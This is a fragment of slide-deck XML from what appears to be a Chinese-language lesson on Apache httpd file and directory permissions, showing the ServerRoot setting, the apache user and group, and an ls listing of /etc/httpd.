              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280670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错误输出文件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680" y="3603053"/>
            <a:ext cx="17197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目录权限：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3992" y="2008632"/>
            <a:ext cx="4615180" cy="646430"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4615180" h="646430">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4614672" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4614672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8987" y="2004161"/>
            <a:ext cx="4624705" cy="655955"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4624705" h="655955">
                <a:moveTo>
                  <a:pt x="4619840" y="655853"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="655853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="655612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="654938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="653884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="652564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4619840" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462460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46328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624603" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624362" y="652564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4623688" y="653884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4622634" y="654938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4621301" y="655612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4619840" y="655853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4624705" h="6559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624705" h="655955">
                <a:moveTo>
                  <a:pt x="461507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615078" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4615078" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4624705" h="655955">
                <a:moveTo>
                  <a:pt x="4615078" y="651090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4615078" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4619840" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624603" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624603" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4619840" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4615078" y="651090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4624705" h="655955">
                <a:moveTo>
                  <a:pt x="4624603" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4619840" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4615078" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624603" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624603" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4624705" h="655955">
                <a:moveTo>
                  <a:pt x="9525" y="651090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="651090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4624705" h="655955">
                <a:moveTo>
                  <a:pt x="4615078" y="651090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4615078" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4615078" y="651090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4624705" h="655955">
                <a:moveTo>
                  <a:pt x="4624603" y="651090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4615078" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4619840" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624603" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624603" y="651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992" y="2030514"/>
            <a:ext cx="4615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 marR="30676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User apache  Group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apache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992" y="2781300"/>
            <a:ext cx="4615180" cy="368935"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4615180" h="368935">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4614672" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4614672" y="368807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36880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8987" y="2776308"/>
            <a:ext cx="4624705" cy="379095"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4624705" h="379094">
                <a:moveTo>
                  <a:pt x="4619840" y="378866"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="378866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="378625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="377952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="376897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="375577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="374103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4619840" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462460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41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="374103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624603" y="374103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624362" y="375577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4623688" y="376897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4622634" y="377952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4621301" y="378625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4619840" y="378866"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4624705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624705" h="379094">
                <a:moveTo>
                  <a:pt x="461507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615078" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4615078" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4624705" h="379094">
                <a:moveTo>
                  <a:pt x="4615078" y="374103"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4615078" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4619840" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624603" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624603" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4619840" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4615078" y="374103"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4624705" h="379094">
                <a:moveTo>
                  <a:pt x="4624603" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4619840" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4615078" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624603" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624603" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4624705" h="379094">
                <a:moveTo>
                  <a:pt x="9525" y="374103"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="374103"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4624705" h="379094">
                <a:moveTo>
                  <a:pt x="4615078" y="374103"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="374103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4615078" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4615078" y="374103"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4624705" h="379094">
                <a:moveTo>
                  <a:pt x="4624603" y="374103"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4615078" y="374103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4619840" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624603" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4624603" y="374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93992" y="2802661"/>
            <a:ext cx="4615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ServerRoot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"/etc/httpd"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01111" y="3659123"/>
            <a:ext cx="8608060" cy="2970277"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8608060" h="2586354">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8607552" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8607552" y="2586228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="258622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96311" y="3654831"/>
            <a:ext cx="8617585" cy="2974569"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8617585" h="2595245">
                <a:moveTo>
                  <a:pt x="8612517" y="2594851"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2594851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="2594622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="2593949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="2592895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="2591562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2590088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8612517" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="861728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585326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="2585326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2590088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8617280" y="2590088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8617038" y="2591562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8616365" y="2592895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8615311" y="2593949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8613978" y="2594622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8612517" y="2594851"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8617585" h="2595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617585" h="2595245">
                <a:moveTo>
                  <a:pt x="860775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607755" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8607755" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8617585" h="2595245">
                <a:moveTo>
                  <a:pt x="8607755" y="2590088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8607755" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8612517" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8617280" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8617280" y="2585326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8612517" y="2585326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8607755" y="2590088"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8617585" h="2595245">
                <a:moveTo>
                  <a:pt x="8617280" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8612517" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8607755" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8617280" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8617280" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8617585" h="2595245">
                <a:moveTo>
                  <a:pt x="9525" y="2590088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2585326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2585326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2590088"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8617585" h="2595245">
                <a:moveTo>
                  <a:pt x="8607755" y="2590088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="2590088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2585326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8607755" y="2585326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8607755" y="2590088"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8617585" h="2595245">
                <a:moveTo>
                  <a:pt x="8617280" y="2590088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8607755" y="2590088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8612517" y="2585326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8617280" y="2585326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8617280" y="25900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79813" y="3681183"/>
            <a:ext cx="7026187" cy="16902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2065" algn="l"/>
                <a:tab pos="2767965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>drwxr-xr-x.	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5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> root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	92 5 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r>
              <a:rPr sz="1800" spc="25" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>28 18:47 httpd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[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>root@localhost httpd]# </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ls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rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r-xr-x. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800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root root 37 8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70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>11 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>04:56</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-254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conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" spc="-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5088" y="5076675"/>
            <a:ext cx="307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drwx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r-x</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r-x.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118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drwxr-x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r-x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184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7822" y="5076675"/>
            <a:ext cx="241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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>10:58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conf.d</a:t>
            </a:r>
            <a:endParaRPr sz="180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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>00:14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conf.modules.d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9813" y="5672793"/>
            <a:ext cx="81343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lrwxrwxrwx. 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>root root 19 5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28 18:47 logs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3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../../var/log/httpd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lrwxrwxrwx. 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>root root 29 5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28 18:47 modules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3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../../usr/lib64/httpd/modules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lrwxrwxrwx. 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>root root 10 5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28 18:47 run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3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/run/httpd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1644" y="4029455"/>
            <a:ext cx="1839595" cy="923925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1839595" h="923925">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1839468" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1839468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F3E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30349" y="4050525"/>
            <a:ext cx="86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0"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="554355" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r-x	r-x  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>101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10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0739" y="4050525"/>
            <a:ext cx="67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-Rwx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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-111-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4+2+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9850" y="1468182"/>
            <a:ext cx="2531783" cy="82458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配置文件权限：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>
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>可执行文件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httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t> 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51" y="4005642"/>
            <a:ext cx="33692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日志文件权限（</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="235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og</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="180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9151" y="4050490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36491" y="1575816"/>
            <a:ext cx="5980430" cy="370840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5980430" h="370839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5980175" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980175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1310" y="1571371"/>
            <a:ext cx="5989955" cy="379095"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5989955" h="379094">
                <a:moveTo>
                  <a:pt x="5985052" y="378866"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="378866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="378625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="377951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="376897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="375564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="374103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5985052" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="598981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69341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="374103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="374103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989586" y="375564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5988913" y="376897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5987859" y="377951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5986526" y="378625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5985052" y="378866"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="37909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989955" h="379094">
                <a:moveTo>
                  <a:pt x="598029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980290" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980290" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="379094">
                <a:moveTo>
                  <a:pt x="5980290" y="374103"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5980290" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5985052" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5985052" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980290" y="374103"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="379094">
                <a:moveTo>
                  <a:pt x="5989815" y="9524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5985052" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980290" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="379094">
                <a:moveTo>
                  <a:pt x="9525" y="374103"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="374103"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="379094">
                <a:moveTo>
                  <a:pt x="5980290" y="374103"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="374103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980290" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980290" y="374103"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="379094">
                <a:moveTo>
                  <a:pt x="5989815" y="374103"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5980290" y="374103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5985052" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="374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4967" y="2043683"/>
            <a:ext cx="5980430" cy="646430"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5980430" h="646430">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5980176" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980176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0726" y="2039404"/>
            <a:ext cx="5989955" cy="655955"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5989955" h="655955">
                <a:moveTo>
                  <a:pt x="5985052" y="655853"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="655853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="655624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="654951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="653897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="652564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5985052" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="598981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46328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989586" y="652564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5988913" y="653897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5987859" y="654951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5986526" y="655624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5985052" y="655853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="6559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89955" h="655955">
                <a:moveTo>
                  <a:pt x="598029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80290" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980290" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="655955">
                <a:moveTo>
                  <a:pt x="5980290" y="651090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5980290" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5985052" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5985052" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980290" y="651090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="655955">
                <a:moveTo>
                  <a:pt x="5989815" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5985052" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980290" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="9525"/>
